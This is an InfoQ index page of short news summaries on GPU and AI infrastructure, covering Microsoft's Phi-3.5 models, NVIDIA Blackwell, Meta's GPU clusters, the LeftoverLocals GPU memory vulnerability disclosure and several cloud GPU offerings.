InfoQ Homepage GPU Content on InfoQ
-
Microsoft Launches Open-Source Phi-3.5 Models for Advanced AI Development
Microsoft launched three new open-source AI models in its Phi-3.5 series: Phi-3.5-mini-instruct, Phi-3.5-MoE-instruct, and Phi-3.5-vision-instruct. Available under a permissive MIT license, these models offer developers powerful tools for various tasks, including reasoning, multilingual processing, and image and video analysis.
-
Meta's Research SuperCluster for Real-Time Voice Translation AI Systems
A recent article from Engineering at Meta reveals how the company is building Research SuperCluster (RSC) infrastructure that is used for advancements in real-time voice translations, language processing, computer vision, and augmented reality (AR).
-
NVIDIA Announces Next-Generation AI Superchip Blackwell
NVIDIA recently announced their next generation GPU architecture, Blackwell. Blackwell is the largest GPU ever built, with over 200 billion transistors, and can train large language models (LLMs) up to 4x faster than previous generation hardware.
-
Nvidia Announces Robotics-Oriented AI Foundational Model
At its recent GTC 2024 event, Nvidia announced a new foundational model to build intelligent humanoid robots. Dubbed GR00T, short for Generalist Robot 00 Technology, the model will understand natural language and be able to observe human actions and emulate human movements.
-
Meta Unveils 24k GPU AI Infrastructure Design
Meta recently announced the design of two new AI computing clusters, each containing 24,576 GPUs. The clusters are based on Meta's Grand Teton hardware platform, and one cluster is currently used by Meta for training their next-generation Llama 3 model.
-
NVIDIA Introduces Metropolis Microservices for Jetson to Run AI Apps at the Edge
NVIDIA has expanded its Nvidia Metropolis Microservices Cloud-based AI solution to run on the NVIDIA Jetson IoT embedded platform, including support for video streaming and AI-based perception.
-
LeftoverLocals May Leak LLM Responses on Apple, Qualcomm, and AMD GPUs
Security firm Trail of Bits disclosed a vulnerability allowing malicious actors to recover data from GPU local memory on Apple, Qualcomm, AMD, and Imagination GPUs. Dubbed LeftoverLocals, the vulnerability affects any application using the GPU, including Large Language Models (LLMs) and machine learning (ML) models.
-
AWS Unveils Gemini, a Distributed Training System for Swift Failure Recovery in Large Model Training
AWS and Rice University have introduced Gemini, a new distributed training system to redefine failure recovery in large-scale deep learning models. According to the research paper, Gemini adopts a daring strategy by utilizing CPU memory to ensure previously unheard-of speeds in failure recovery, overcoming obstacles related to high recovery costs and constrained checkpoint storage capacity.
-
Microsoft Releases DeepSpeed-FastGen for High-Throughput Text Generation
Microsoft has announced the alpha release of DeepSpeed-FastGen, a system designed to improve the deployment and serving of large language models (LLMs). DeepSpeed-FastGen is the synergistic composition of DeepSpeed-MII and DeepSpeed-Inference . DeepSpeed-FastGen is based on the Dynamic SplitFuse technique. The system currently supports several model architectures.
-
Python-Like Numerical Computation Library MatX Brings Transforms as Operators and Other Features
Developed by Nvidia for its own GPUs, MatX is a C++ library that aims to bring near-native performance in numerical computing using a high-level syntax not far from those available in Python scipy or MATLAB. Its latest release brings a number of new features, including the possibility to use transforms as operators, new operators such as upsample, downsample, pwelch, and more.
-
Google Cloud Ops Agent Can Now Monitor Nvidia GPUs
Google Cloud announced that Ops Agent, the agent for collecting telemetry from Compute Engine instances, can now collect and aggregate metrics from NVIDIA GPUs on VMs.
-
Azure Previews ND H100 V5 Virtual Machines to Accelerate Generative AI
Azure recently announced the preview of the ND H100 v5, virtual machines that integrate the latest Nvidia H100 Tensor Core GPUs and support Quantum-2 InfiniBand networking. According to Microsoft, the new option will offer AI developers improved performance and scaling across thousands of GPUs.
-
AWS and NVIDIA to Collaborate on Next-Gen EC2 P5 Instances for Accelerating Generative AI
AWS and NVIDIA announced the development of a highly scalable, on-demand AI infrastructure that is specifically designed for training large language models and creating advanced generative AI applications. The collaboration aims to create the most optimized and efficient system of its kind, capable of meeting the demands of increasingly complex AI tasks.
-
NVIDIA Kubernetes Device Plug-in Brings Temporal GPU Concurrency
Starting from the v12 release, the Nvidia GPU device plug-in framework started supporting time-sliced sharing between CUDA workloads on Kubernetes. This feature aims to prevent under-utilization of GPU units and make it easier to scale applications by leveraging concurrently-executing CUDA contexts.
-
Asahi Linux Gets Alpha GPU Drivers on Apple Silicon
After two years of work to reverse engineer Apple Silicon GPU instruction set and to implement the kernel driver, Asahi Linux has finally got an alpha-quality release of its GPU driver that is already good enough to run a smooth desktop experience and some games, Asahi developers Alyssa Rosenzweig and Asahi Lina say.